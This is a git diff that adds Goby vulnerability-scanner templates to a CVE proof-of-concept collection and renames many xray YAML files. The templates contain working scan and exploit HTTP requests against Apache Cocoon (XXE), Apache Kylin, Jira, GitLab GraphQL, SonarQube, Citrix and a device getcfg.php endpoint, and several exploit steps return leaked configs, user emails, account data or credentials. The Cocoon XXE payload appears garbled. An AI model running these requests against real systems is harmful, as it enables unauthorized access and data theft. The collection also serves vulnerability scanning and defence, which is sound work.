+ "value": "<name>",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "<password>",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/getcfg.php",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-26 19:19:16",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
diff --git a/2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yaml b/2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yml
similarity index 100%
rename from 2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yaml
rename to 2019/CVE-2019-17506/poc/xray/CVE-2019-17506.yml
diff --git a/2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yaml b/2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yml
similarity index 100%
rename from 2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yaml
rename to 2019/CVE-2019-18394/poc/xray/CVE-2019-18394.yml
diff --git a/2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yaml b/2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yml
similarity index 100%
rename from 2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yaml
rename to 2019/CVE-2019-19781/poc/xray/CVE-2019-19781.yml
diff --git a/2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yaml b/2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yml
similarity index 100%
rename from 2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yaml
rename to 2019/CVE-2019-19985/poc/xray/CVE-2019-19985.yml
diff --git a/2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yaml b/2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yml
similarity index 100%
rename from 2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yaml
rename to 2019/CVE-2019-20085/poc/xray/CVE-2019-20085.yml
diff --git a/2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yaml b/2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yml
similarity index 100%
rename from 2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yaml
rename to 2019/CVE-2019-20224/poc/xray/CVE-2019-20224.yml
diff --git a/2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yaml b/2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yml
similarity index 100%
rename from 2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yaml
rename to 2019/CVE-2019-2725/poc/xray/CVE-2019-2725.yml
diff --git a/2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yaml b/2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yml
similarity index 100%
rename from 2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yaml
rename to 2019/CVE-2019-2729/poc/xray/CVE-2019-2729.yml
diff --git a/2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yaml b/2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yml
similarity index 100%
rename from 2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yaml
rename to 2019/CVE-2019-3396/poc/xray/CVE-2019-3396.yml
diff --git a/2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yaml b/2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yml
similarity index 100%
rename from 2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yaml
rename to 2019/CVE-2019-3799/poc/xray/CVE-2019-3799.yml
diff --git a/2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yaml b/2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yml
similarity index 100%
rename from 2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yaml
rename to 2019/CVE-2019-5127/poc/xray/CVE-2019-5127.yml
diff --git a/2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yaml b/2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yml
similarity index 100%
rename from 2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yaml
rename to 2019/CVE-2019-5128/poc/xray/CVE-2019-5128.yml
diff --git a/2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yaml b/2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yml
similarity index 100%
rename from 2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yaml
rename to 2019/CVE-2019-5129/poc/xray/CVE-2019-5129.yml
diff --git a/2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yaml b/2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yml
similarity index 100%
rename from 2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yaml
rename to 2019/CVE-2019-6340/poc/xray/CVE-2019-6340.yml
diff --git a/2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yaml b/2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yml
similarity index 100%
rename from 2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yaml
rename to 2019/CVE-2019-7192/poc/xray/CVE-2019-7192.yml
diff --git a/2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yaml b/2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yml
similarity index 100%
rename from 2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yaml
rename to 2019/CVE-2019-7238/poc/xray/CVE-2019-7238.yml
diff --git a/2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yaml b/2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yml
similarity index 100%
rename from 2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yaml
rename to 2019/CVE-2019-8442/poc/xray/CVE-2019-8442.yml
diff --git a/2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yaml b/2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yml
similarity index 100%
rename from 2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yaml
rename to 2019/CVE-2019-8449/poc/xray/CVE-2019-8449.yml
diff --git a/2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yaml b/2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yml
similarity index 100%
rename from 2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yaml
rename to 2019/CVE-2019-8451/poc/xray/CVE-2019-8451.yml
diff --git a/2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yaml b/2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yml
similarity index 100%
rename from 2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yaml
rename to 2019/CVE-2019-9670/poc/xray/CVE-2019-9670.yml
diff --git a/2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yaml b/2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yml
similarity index 100%
rename from 2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yaml
rename to 2020/CVE-2020-10148/poc/xray/CVE-2020-10148.yml
diff --git a/2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yaml b/2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yml
similarity index 100%
rename from 2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yaml
rename to 2020/CVE-2020-10199/poc/xray/CVE-2020-10199.yml
diff --git a/2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yaml b/2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yml
similarity index 100%
rename from 2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yaml
rename to 2020/CVE-2020-10204/poc/xray/CVE-2020-10204.yml
diff --git a/2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yaml b/2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yml
similarity index 100%
rename from 2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yaml
rename to 2020/CVE-2020-11710/poc/xray/CVE-2020-11710.yml
diff --git "a/2020/CVE-2020-11991/poc/goby/Apache Cocoon Xml \346\263\250\345\205\245 CVE-2020-11991.json" "b/2020/CVE-2020-11991/poc/goby/Apache Cocoon Xml \346\263\250\345\205\245 CVE-2020-11991.json"
new file mode 100644
index 000000000..56bcaae8c
--- /dev/null
+++ "b/2020/CVE-2020-11991/poc/goby/Apache Cocoon Xml \346\263\250\345\205\245 CVE-2020-11991.json"
@@ -0,0 +1,55 @@
+{
+ "Name": "Apache Cocoon Xml 注入 CVE-2020-11991",
+ "Level": "1",
+ "Tags": [
+ "XML注入"
+ ],
+ "GobyQuery": "app=\"Apache-Cocoon\"",
+ "Description": "9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12",
+ "Product": "Apache Cocoon",
+ "Homepage": "http://cocoon.apache.org/2.1/",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐑
",
+ "Recommandation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/v2/api/product/manger/getInfo",
+ "follow_redirect": true,
+ "header": {
+ "Content-type": "text/xml"
+ },
+ "data_type": "text",
+ "data": "\n ]>\n\nJohn \n&ent;\n"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "PostTime": "2021-01-22 22:24:01",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git "a/2020/CVE-2020-13937/poc/goby/Apache Kylin \346\234\252\346\216\210\346\235\203\351\205\215\347\275\256\346\263\204\351\234\262 CVE-2020-13937.json" "b/2020/CVE-2020-13937/poc/goby/Apache Kylin \346\234\252\346\216\210\346\235\203\351\205\215\347\275\256\346\263\204\351\234\262 CVE-2020-13937.json"
new file mode 100644
index 000000000..2d752cbcd
--- /dev/null
+++ "b/2020/CVE-2020-13937/poc/goby/Apache Kylin \346\234\252\346\216\210\346\235\203\351\205\215\347\275\256\346\263\204\351\234\262 CVE-2020-13937.json"
@@ -0,0 +1,78 @@
+{
+ "Name": "Apache Kylin 未授权配置泄露 CVE-2020-13937",
+ "Level": "0",
+ "Tags": [
+ "Disclosure of Sensitive Information"
+ ],
+ "GobyQuery": "app=\"APACHE-kylin\"",
+ "Description": "Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息。\nhttp://xxx.xxx.xxx.xxx/kylin/api/admin/config\n\nApahche Kylin 2.x.x\nApahche Kylin <= 3.1.0\nApahche Kylin 4.0.0-alpha",
+ "Product": "Apache Kylin",
+ "Homepage": "http://kylin.apache.org/cn/",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Config",
+ "type": "select",
+ "value": "/kylin/api/admin/config",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/kylin/api/admin/config",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "config",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/kylin/api/admin/config",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-24 13:03:37",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git a/2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yaml b/2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yml
similarity index 100%
rename from 2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yaml
rename to 2020/CVE-2020-13937/poc/xray/CVE-2020-13937.yml
diff --git a/2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yaml b/2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yml
similarity index 100%
rename from 2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yaml
rename to 2020/CVE-2020-14179/poc/xray/CVE-2020-14179.yml
diff --git "a/2020/CVE-2020-14181/poc/goby/Atlassian Jira \344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-14181.json" "b/2020/CVE-2020-14181/poc/goby/Atlassian Jira \344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-14181.json"
new file mode 100644
index 000000000..75dd54f6d
--- /dev/null
+++ "b/2020/CVE-2020-14181/poc/goby/Atlassian Jira \344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-14181.json"
@@ -0,0 +1,51 @@
+{
+ "Name": "Atlassian Jira 信息泄露漏洞 CVE-2020-14181",
+ "Level": "0",
+ "Tags": [],
+ "GobyQuery": "(app=\"JIRA\" || title=\"System Dashboard\")",
+ "Description": "Jira存在一个未授权访问漏洞,未授权的用户可以通过一个api接口直接查询到某用户名的存在情况,该接口不同于CVE-2019-8446和CVE-2019-3403的接口,是一个新的接口。如果Jira暴露在公网中,未授权用户就可以直接访问该接口爆破出潜在的用户名。",
+ "Product": "Jira",
+ "Homepage": "https://ones.ai/",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/secure/ViewUserHover.jspa?username=peiqipeiqipeiqi",
+ "follow_redirect": false,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "peiqipeiqipeiqi",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "PostTime": "2021-01-29 10:56:59",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git a/2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yaml b/2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yml
similarity index 100%
rename from 2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yaml
rename to 2020/CVE-2020-14181/poc/xray/CVE-2020-14181.yml
diff --git a/2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yaml b/2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yml
similarity index 100%
rename from 2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yaml
rename to 2020/CVE-2020-14750/poc/xray/CVE-2020-14750.yml
diff --git a/2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yaml b/2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yml
similarity index 100%
rename from 2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yaml
rename to 2020/CVE-2020-15568/poc/xray/CVE-2020-15568.yml
diff --git a/2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yaml b/2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yml
similarity index 100%
rename from 2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yaml
rename to 2020/CVE-2020-16846/poc/xray/CVE-2020-16846.yml
diff --git a/2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yaml b/2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yml
similarity index 100%
rename from 2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yaml
rename to 2020/CVE-2020-17519/poc/xray/CVE-2020-17519.yml
diff --git a/2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yaml b/2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yml
similarity index 100%
rename from 2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yaml
rename to 2020/CVE-2020-21224/poc/xray/CVE-2020-21224.yml
diff --git a/2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yaml b/2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yml
similarity index 100%
rename from 2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yaml
rename to 2020/CVE-2020-24571/poc/xray/CVE-2020-24571.yml
diff --git a/2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yaml b/2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yml
similarity index 100%
rename from 2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yaml
rename to 2020/CVE-2020-25078/poc/xray/CVE-2020-25078.yml
diff --git "a/2020/CVE-2020-26413/poc/goby/GitLab Graphql\351\202\256\347\256\261\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-26413.json" "b/2020/CVE-2020-26413/poc/goby/GitLab Graphql\351\202\256\347\256\261\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-26413.json"
new file mode 100644
index 000000000..90fc00c39
--- /dev/null
+++ "b/2020/CVE-2020-26413/poc/goby/GitLab Graphql\351\202\256\347\256\261\344\277\241\346\201\257\346\263\204\351\234\262\346\274\217\346\264\236 CVE-2020-26413.json"
@@ -0,0 +1,88 @@
+{
+ "Name": "GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413",
+ "Level": "0",
+ "Tags": [
+ "信息泄露"
+ ],
+ "GobyQuery": "app=\"GitLab\"",
+ "Description": "GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名",
+ "Product": "GitLab 13.4 - 13.6.2",
+ "Homepage": "https://about.gitlab.com/pricing/",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "https://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/api/graphql",
+ "follow_redirect": true,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": "{\"query\":\"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\"variables\":null,\"operationName\":null}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "username",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "email",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "@",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/api/graphql",
+ "follow_redirect": true,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": "{\"query\":\"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\"variables\":null,\"operationName\":null}"
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-03-09 13:34:57",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git a/2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yaml b/2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yml
similarity index 100%
rename from 2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yaml
rename to 2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yml
diff --git a/2020/CVE-2020-27986/poc/goby/CVE-2020-27986.json b/2020/CVE-2020-27986/poc/goby/CVE-2020-27986.json
new file mode 100644
index 000000000..e736b52e8
--- /dev/null
+++ b/2020/CVE-2020-27986/poc/goby/CVE-2020-27986.json
@@ -0,0 +1,69 @@
+{
+ "Name": "SonarQube unauth CVE-2020-27986",
+ "Level": "3",
+ "Tags": [
+ "unauth"
+ ],
+ "GobyQuery": "app=\"SonarQube\"",
+ "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.",
+ "Product": "SonarQube",
+ "Homepage": "https://www.sonarqube.org/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986"
+ ],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/settings/values",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "sonaranalyzer-cs.nuget.packageVersion",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "sonar.core.id",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-29 15:03:58",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
diff --git a/2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yaml b/2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yml
similarity index 100%
rename from 2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yaml
rename to 2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yml
diff --git a/2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yaml b/2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yml
similarity index 100%
rename from 2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yaml
rename to 2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yml
diff --git a/2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yaml b/2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yml
similarity index 100%
rename from 2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yaml
rename to 2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yml
diff --git a/2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yaml b/2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yml
similarity index 100%
rename from 2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yaml
rename to 2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yml
diff --git a/2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yaml b/2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yml
similarity index 100%
rename from 2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yaml
rename to 2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yml
diff --git a/2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yaml b/2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yml
similarity index 100%
rename from 2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yaml
rename to 2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yml
diff --git a/2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yaml b/2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yml
similarity index 100%
rename from 2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yaml
rename to 2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yml
diff --git a/2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yaml b/2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yml
similarity index 100%
rename from 2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yaml
rename to 2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yml
diff --git a/2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yaml b/2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yml
similarity index 100%
rename from 2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yaml
rename to 2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yml
diff --git a/2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yaml b/2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yml
similarity index 100%
rename from 2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yaml
rename to 2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yml
diff --git a/2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yaml b/2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yml
similarity index 100%
rename from 2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yaml
rename to 2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yml
diff --git a/2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yaml b/2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yml
similarity index 100%
rename from 2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yaml
rename to 2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yml
diff --git a/2020/CVE-2020-8193/poc/goby/CVE-2020-8193.json b/2020/CVE-2020-8193/poc/goby/CVE-2020-8193.json
new file mode 100644
index 000000000..493dc2c5c
--- /dev/null
+++ b/2020/CVE-2020-8193/poc/goby/CVE-2020-8193.json
@@ -0,0 +1,104 @@
+{
+ "Name": "Citrix Unauthorized CVE-2020-8193",
+ "Level": "3",
+ "Tags": [
+ "Unauthorized"
+ ],
+ "GobyQuery": "(app=\"citrix-公司产品\" | title=\"Citrix Login\" | body=\"Citrix ADC\")",
+ "Description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints",
+ "Product": "citrix",
+ "Homepage": "https://www.citrix.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/xml",
+ "X-NITRO-PASS": "{{{str1}}}",
+ "X-NITRO-USER": "{{{str2}}}"
+ },
+ "data_type": "text",
+ "data": "",
+ "set_variable": [
+ "str2|rand|str|8",
+ "str1|rand|str|8"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "406",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$head",
+ "operation": "contains",
+ "value": "SESSID=",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-06 14:18:50",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yaml b/2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yml
similarity index 100%
rename from 2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yaml
rename to 2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yml
